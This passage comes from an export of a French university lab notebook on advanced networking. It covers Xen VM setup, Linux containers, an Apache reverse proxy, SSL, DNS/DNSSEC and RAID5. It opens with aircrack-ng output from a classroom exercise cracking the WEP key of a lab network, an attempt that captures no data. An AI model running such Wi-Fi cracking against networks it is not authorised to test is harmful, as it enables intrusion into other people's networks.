                                                                   &lt;br /&gt;
 C4:14:3C:40:78:61  -64   0    16423        0    0   3  54e. WEP  W&lt;br /&gt;
                                                                   &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames&lt;br /&gt;
                                                                   &lt;br /&gt;
&lt;br /&gt;
root@zabeth15:/home/pifou# ls&lt;br /&gt;
3D				       Documents&lt;br /&gt;
Arduino				       Downloads&lt;br /&gt;
crack_wep_ungdelatte-01.cap	       GIS4_Bernard_Castelein&lt;br /&gt;
crack_wep_ungdelatte-01.csv	       IMA5sc-ASR&lt;br /&gt;
crack_wep_ungdelatte-01.kismet.csv     Music&lt;br /&gt;
crack_wep_ungdelatte-01.kismet.netxml  Pictures&lt;br /&gt;
crack_wep_ungdelatte-02.cap	       Public&lt;br /&gt;
crack_wep_ungdelatte-02.csv	       R&lt;br /&gt;
crack_wep_ungdelatte-02.kismet.csv     replay_arp-1212-153701.cap&lt;br /&gt;
crack_wep_ungdelatte-02.kismet.netxml  Templates&lt;br /&gt;
Desktop				       Videos&lt;br /&gt;
root@zabeth15:/home/pifou# aircrack-ng crack_wep_ungdelatte-02.cap&lt;br /&gt;
Opening crack_wep_ungdelatte-02.cap&lt;br /&gt;
Read 13001 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
&lt;br /&gt;
   1  C4:14:3C:40:78:61  banane                    No data - WEP or WPA&lt;br /&gt;
&lt;br /&gt;
Choosing first network as target.&lt;br /&gt;
&lt;br /&gt;
Opening crack_wep_ungdelatte-02.cap&lt;br /&gt;
Got no data packets from target network!&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Quitting aircrack-ng...&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en réseau et création de conteneurs sous Machine Virtuelle Linux&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On se propose dans cette partie de réaliser la création et la mise en réseau de conteneurs sous Linux.&lt;br /&gt;
&lt;br /&gt;
Après avoir créé un système de fichiers avec debootstrap puis une machine virtuelle (IMA5-BANANE en l'occurence) sur le serveur de virtualisation Cordouan, on crée trois conteneurs C1, C2 et C3 distincts au sein celle-ci.&lt;br /&gt;
&lt;br /&gt;
Connecter les conteneurs en réseau :&lt;br /&gt;
&lt;br /&gt;
    créer une double interface Ethernet virtuelle ;&lt;br /&gt;
    sur l’hôte ajouter l’interface dans un pont virtuel ;&lt;br /&gt;
    envoyer le pair dans l’espace réseau du conteneur ;&lt;br /&gt;
    configurer l’adresse IP sur l’interface du conteneur ...&lt;br /&gt;
    ... il peut être nécessaire d’utiliser nsenter. &lt;br /&gt;
&lt;br /&gt;
Pour la création d'un conteneur, on utilise la commande unshare couplée à des options et à une fonction serverx.sh qui ne fait que repeter une fonction sleep 5 en boucle. Elle permet de lancer séparément une commande (ici /bin/serverx.sh) en définissant un root différent.&lt;br /&gt;
&lt;br /&gt;
    unshare -n -u -m -p -f chroot ./chroot /bin/serverx.sh&lt;br /&gt;
&lt;br /&gt;
Si on veut entrer dans le conteneur après en être sorti, on utilise la commande:&lt;br /&gt;
&lt;br /&gt;
    nsenter -n -u -m -p -t &amp;lt;PID&amp;gt; chroot ./chroot /bin/bash&lt;br /&gt;
&lt;br /&gt;
On ajoute alors toutes nos interfaces virtuelles eth0@vifX de type veth. Les Ponts &amp;quot;monpont&amp;quot; et &amp;quot;carrefour&amp;quot; ont déjà été définis dans /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
    ip link add vif1 type veth peer name eth0@vif1&lt;br /&gt;
    ip link add vif2 type veth peer name eth0@vif2&lt;br /&gt;
    ip link add vif3 type veth peer name eth0@vif3&lt;br /&gt;
    ip link add vif4 type veth peer name eth0@vif4&lt;br /&gt;
&lt;br /&gt;
On ajoute les vifx aux ponts correspondants&lt;br /&gt;
&lt;br /&gt;
    ip link set vif1 master monpont&lt;br /&gt;
    ip link set vif2 master carrefour &lt;br /&gt;
    ip link set vif3 master carrefour&lt;br /&gt;
    ip link set vif4 master carrefour&lt;br /&gt;
 &lt;br /&gt;
On peut vérifier la création à chaque commande grâce aux la commande:&lt;br /&gt;
&lt;br /&gt;
    ip l show et brctl show&lt;br /&gt;
&lt;br /&gt;
L'adresse ip de &amp;quot;monpont&amp;quot; est défini dans le fichier interfaces avec l'adresse 193.48.57.179 et est connecté au réseau via eth0&lt;br /&gt;
Nous avons choisis le reseau local entre les conteneur sur la plage 192.168.0.0/24. L'adresse de &amp;quot;carrefour&amp;quot; est 192.168.0.1.&lt;br /&gt;
&lt;br /&gt;
On peut alors définir eth0@vif1 (renommée eth0) comme étant l'interface entre le reverse proxy et &amp;quot;monpont&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
    ip link set eth0@vif1 netns /proc/&amp;lt;PID&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
On peut alors définir eth0@vif2 (renommée eth1) comme étant l'interface entre le reverse proxy et les carrefour.&lt;br /&gt;
&lt;br /&gt;
    ip link set eth0@vif2 netns /proc/&amp;lt;PID&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
On peut alors définir eth0@vif3 et eth0@vif4 (renommées eth0) comme étant les interfaces respectives entre le server1, serveur 2 et le pont carrefour.&lt;br /&gt;
&lt;br /&gt;
    ip link set eth0@vif3 netns /proc/&amp;lt;PID&amp;gt;/ns/net name eth0&lt;br /&gt;
    ip link set eth0@vif4 netns /proc/&amp;lt;PID&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur &amp;quot;chroot&amp;quot;, on ajoute alors l'adresse IP 193.48.57.189/28 à eth0 et on active eth0, vif1 et &amp;quot;monpont&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
    ip addr add 193.48.57.189/28 dev eth0&lt;br /&gt;
    ip link set dev eth0 up&lt;br /&gt;
    ip link set vif1 up&lt;br /&gt;
    ip link set dev monpont up&lt;br /&gt;
&lt;br /&gt;
Dans le conteneurs serverX et dans le reverse proxy, on ajoute alors les adresse IP 192.168.0.100/24 et 192.168.0.200/24 et 192.168.0.150/24 aux eth0 respectifs puis on active vif2 vif3 vif4 et &amp;quot;carrefour&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
Le réseau étant fonctionnel nous pouvons nous attaquer à la configuration des serveur apache2.&lt;br /&gt;
&lt;br /&gt;
Nous avons donc installé un serveur apache2 dans chaque conteneur.&lt;br /&gt;
&lt;br /&gt;
Pour ce qui est du serveur apache qui jouera le rôle de reverse proxy le fichier de configuration se trouvant dans /etc/apache2/sites-available sera configuré de la manière suivante:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 ServerName 193.48.57.189:80&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.189:80&amp;gt;&lt;br /&gt;
	 ServerName reverse.banane.space&lt;br /&gt;
	 DocumentRoot /var/www/html&lt;br /&gt;
&lt;br /&gt;
	 ProxyPass / http://192.168.0.100:631&lt;br /&gt;
    	 ProxyPassReverse / http://192.168.0.100:631&lt;br /&gt;
    	 ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
	 LogFormat &amp;quot;%h %l %u %t \&amp;quot;%r\&amp;quot; %&amp;gt;s %b&amp;quot; common&lt;br /&gt;
	 CustomLog logs/access_log common&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On retrouve l'adresse du serveur apache qui correspond à celle du conteneur relié au réseau 192.48.57.189.&lt;br /&gt;
&lt;br /&gt;
On redirigera les requêtes via le port 631 (TCP/UDP) toutefois il est tout à fais possible de le faire circuler sur le port 80 car les serveurs se trouvent normalement dans des conteneurs.&lt;br /&gt;
&lt;br /&gt;
Au niveau de '''server1'''(équivalent pour server2) j'ai seulement cré un serveur apache2 sous cette forme:&lt;br /&gt;
&lt;br /&gt;
 ServerName 192.168.0.100:631&lt;br /&gt;
 &amp;lt;VirtualHost 192.168.0.100:631&amp;gt;&lt;br /&gt;
	 ServerName site1.banane.space&lt;br /&gt;
	 DocumentRoot /var/www/html&lt;br /&gt;
&lt;br /&gt;
	 LogFormat &amp;quot;%h %l %u %t \&amp;quot;%r\&amp;quot; %&amp;gt;s %b&amp;quot; common&lt;br /&gt;
	 CustomLog logs/access_log common&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
il peut être nécessaire de demander dans ports.conf d'écouter le port 631.&lt;br /&gt;
&lt;br /&gt;
Dans le dns db.banane.space nous avons rajouter les différentes adresses:&lt;br /&gt;
&lt;br /&gt;
 reverse	IN	A	193.48.57.189&lt;br /&gt;
 site1	        IN	A	193.48.57.189&lt;br /&gt;
 site2	        IN	A	193.48.57.189&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46463</id>
		<title>Cahier 2017 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46463"/>
				<updated>2017-11-30T11:08:35Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* Mise en réseau et création de conteneurs sous Machine Virtuelle Linux */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Présentation générale'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en contexte&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
Le projet de Réseau Avancé est composé d'une partie commune et d'une tâche particulière par binôme. Ce projet consiste en la configuration d'une architecture réseau avec différentes parties, en plus du câblage et de la configuration des routeurs et commutateurs.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La partie commune consiste en la création et la mise en réseau d'une machine virtuelle; ainsi que la création d'un site sécurisé avec la configuration du serveur SSH, DNS sécurisé et du certificat SSL. La virtualisation permet de faire fonctionner sur une même machine plusieurs OS isolés ou des logiciels grâce aux machines virtuelles. Au-delà de la réduction des coûts, la virtualisation permet aussi de manipuler et gérer plus facilement des OS. Cependant, on s'oriente de plus en plus vers l'isolation par des conteneurs car ils permettent au sein d'un même OS, d'isoler les ressources matérielles et d'éviter des surcharges.&lt;br /&gt;
&lt;br /&gt;
Notre tâche particulière est donc de réaliser la gestion des conteneurs au sein d'une machine virtuelle configurée en réseau.&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Tâches à effectuer&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
* Création d'une machine virtuelle sur le serveur de virtualisation Cordouan&lt;br /&gt;
* Mettre la machine virtuelle en réseau&lt;br /&gt;
* Configuration des services Internet (Serveur SSH, DNS, DNSSEC, Certificat SSL)&lt;br /&gt;
* Crackage de clé Wi-Fi&lt;br /&gt;
* Créer les différents conteneurs et configurer leur accès au réseau (tâche particulière)&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Travail effectué'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
                     &lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Création d'une machine virtuelle Xen sur Cordouan&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On commence par créer une machine virtuelle Xen sur le serveur de virtualisation cordouan.insecserv.deule.net. On se connecte tout d'abord en SSH sur le serveur cordouan.&lt;br /&gt;
&lt;br /&gt;
       ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
       Mot de passe: mot de passe root habituel&lt;br /&gt;
&lt;br /&gt;
On précise:&lt;br /&gt;
&lt;br /&gt;
* le nom de machine virtuelle: IMA5-BANANE&lt;br /&gt;
* son adresse IP sur le réseau: 193.48.57.179/28&lt;br /&gt;
* le répertoire où créer les disques virtuels: /usr/local/xen&lt;br /&gt;
* le miroir Debian: http://debian.polytech-lille.fr/debian&lt;br /&gt;
* la distribution: jessie (qui est la distribution stable courante)&lt;br /&gt;
&lt;br /&gt;
       xen-create-image --hostname=&amp;lt;IMA5-BANANE&amp;gt; --ip 193.48.57.179/28 --dir /usr/local/xen --netmask=255.255.255.240 --gateway=193.48.57.177 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte. Installez les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind (voir la partie services).&lt;br /&gt;
&lt;br /&gt;
       xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-home -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-var -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
[[Fichier:IMA5-BANANE.png]]&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration en faisant en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&lt;br /&gt;
* la mémoire attribuée: 512 Mo&lt;br /&gt;
* l'adresse ip de la MV: 193.48.57.179/28&lt;br /&gt;
* bridge: IMA5sc&lt;br /&gt;
&lt;br /&gt;
       xl list&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# xl list&lt;br /&gt;
       Name                                        ID   Mem VCPUs	State	Time(s)&lt;br /&gt;
       Domain-0                                     0  1993     8     r-----   52219.3&lt;br /&gt;
       karmeliett                                   1   128     1     -b----    2483.6&lt;br /&gt;
       duvel                                        2   512     1     -b----    4225.6&lt;br /&gt;
       deus                                         3   512     1     -b----    4226.4&lt;br /&gt;
       trappe                                       4   512     1     -b----    4082.4&lt;br /&gt;
       Rincecochon                                  6   512     1     -b----    3788.2&lt;br /&gt;
       IMA5-Durian                                 62   512     1     -b----    3237.7&lt;br /&gt;
       IMA5-BANANE                                 84   512     1     -b----     152.9&lt;br /&gt;
       IMA5-Papaye                                 89   512     1     -b----      35.4&lt;br /&gt;
       IMA5-Ananas                                 91   512     1     -b----      27.0&lt;br /&gt;
&lt;br /&gt;
On vérifie que la MV IMA5-BANANE a bien été créée.&lt;br /&gt;
&lt;br /&gt;
       xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On lance IMA5-BANANE en utilisant le log root et le mot de passe configuré.&lt;br /&gt;
&lt;br /&gt;
Commandes de base pour démarrer la VM proprement: &lt;br /&gt;
&lt;br /&gt;
    ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
    xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
    ssh username@weppes&lt;br /&gt;
    ssh root@193.48.57.179&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Services Internet (SSH, DNS sécurisé et certificat SSL)&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On configure à présent les services Internet après avoir acheté un nom de domaine (https://www.banane.space) sur gandi.net pour créer notre site Web sécurisé.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur SSH''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle, nous avons configuré le fichier sshd_config (PubkeyAuthentication ) :&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# vim /etc/ssh/sshd_config&lt;br /&gt;
       &lt;br /&gt;
    RSAAuthentication yes&lt;br /&gt;
    PubkeyAuthentication yes&lt;br /&gt;
    #AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
    PermitRootLogin yes&lt;br /&gt;
       &lt;br /&gt;
    root@IMA5-BANANE:~# service ssh restart&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Certification SSL''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
Nous commencons par acheter un certificat SSL. Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout banane.key -out banane.csr&lt;br /&gt;
    Generating a 2048 bit RSA private key&lt;br /&gt;
    If you enter '.', the field will be left blank.&lt;br /&gt;
    -----&lt;br /&gt;
    Country Name (2 letter code) [AU]:FR&lt;br /&gt;
    State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
    Locality Name (eg, city) []:Lille&lt;br /&gt;
    Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
    Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
    Common Name (e.g. server FQDN or YOUR name) []:banane.space&lt;br /&gt;
    Email Address []:&lt;br /&gt;
    A challenge password []:&lt;br /&gt;
    An optional company name []:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2/sites-available/clef# ls banane.csr banane.key&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2/sites-available/clef# cat banane.csr&lt;br /&gt;
    -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
    &amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
    -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# apt-get install postfix mailx&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# cp certificat.crt /etc/ssl/certs/banane.space.crt&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# cp serveur.key /etc/ssl/private/banane.space.key&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-banane.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2/sites-available# cat 000-banane.space-ssl.conf &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.banane.space&lt;br /&gt;
         ServerAlias banane.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/banane.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/banane.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2# cat ports.conf &lt;br /&gt;
    Listen 80&lt;br /&gt;
    &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
    Listen 443&lt;br /&gt;
    &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
    &amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
    Listen 443&lt;br /&gt;
    &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2# service apache2 stop&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2# service apache2 start&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2# service apache2 reload&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre site est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur DNS''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
On commence par modifier les informations de notre nom de domaine sur le site de Gandi. Ensuite, dans ''&amp;quot;Gérer les Glue Records&amp;quot;'', nous modifions les informations concernant notre nom de domaine.&lt;br /&gt;
&lt;br /&gt;
* nom du serveur: ns.banane.space&lt;br /&gt;
* adresse IP: 193.48.57.179&lt;br /&gt;
* serveurs de nom:&lt;br /&gt;
** DNS1: ns.banane.space&lt;br /&gt;
** DNS2: ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier /etc/bind de notre machine virtuelle.&lt;br /&gt;
Nous modifions dans un premier temps le fichier named.conf.local afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# vim /etc/bind/named.conf.local&lt;br /&gt;
 zone &amp;quot;banane.space&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.banane.space&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
On créée ensuite le fichier db.banane.space:&lt;br /&gt;
&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.banane.space. root.banane.space. (&lt;br /&gt;
                       2016113007       ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns.banane.space. &lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns      IN      A       193.48.57.179&lt;br /&gt;
 www     IN      A       193.48.57.179&lt;br /&gt;
 @       IN      A       193.48.57.179&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# vim /etc/resolv.conf&lt;br /&gt;
    search banane.space&lt;br /&gt;
    nameserver 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''DNS SEC''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Génération des clefs asymétriques: &lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE: dnssec-keygen -a RSASHA1 -b 2048 -r /dev/urandom -f KSK -n ZONE banane.space&lt;br /&gt;
    root@IMA5-BANANE: dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE banane.space&lt;br /&gt;
&lt;br /&gt;
On modifie le nom des clefs: &lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind/banane.space.dnssec# ls&lt;br /&gt;
&lt;br /&gt;
    banane.space-ksk.key	  banane.space-zsk.key	    dsset-banane.space.&lt;br /&gt;
    banane.space-ksk.private  banane.space-zsk.private&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous signons ensuite les zones:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE: dnssec-signzone -o banane.space -k banane.space-ksk ../db.banane.space banane.space-zsk&lt;br /&gt;
&lt;br /&gt;
Pour finir nous ajoutons la clef KSK sur Gandi avec l'algorithme RSA/SHA1. On vérifie que le DNSSEC est bien mis en place.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:DNSSEC.png]]&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Sécurisation des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Nous créons trois nouvelles partitions qui vont représenter nos disques.&lt;br /&gt;
&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-1 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-2 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-3 -v&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons ces partitions dans la machine virtuelle via le fichier IMA5-BANANE.conf&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-1,xvdd,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-2,xvde,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-3,xvdf,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On installe mdadm dans notre MV&lt;br /&gt;
&lt;br /&gt;
    apt-get install mdadm&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite installé l paquetage mdadm puis rebooté la MV.&lt;br /&gt;
&lt;br /&gt;
    mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
Nous créons le volume /dev/md0 pour créer un RAID5 logiciel avec les trois partitions obtenues. On sauvegarde ensuite la configuration actelle.&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --detail --scan &amp;gt;&amp;gt; /etc/mdadm/mdadm.conf&lt;br /&gt;
    root@IMA5-BANANE:~# mkfs /dev/md0&lt;br /&gt;
    root@IMA5-BANANE:~# mkdir /datamd0&lt;br /&gt;
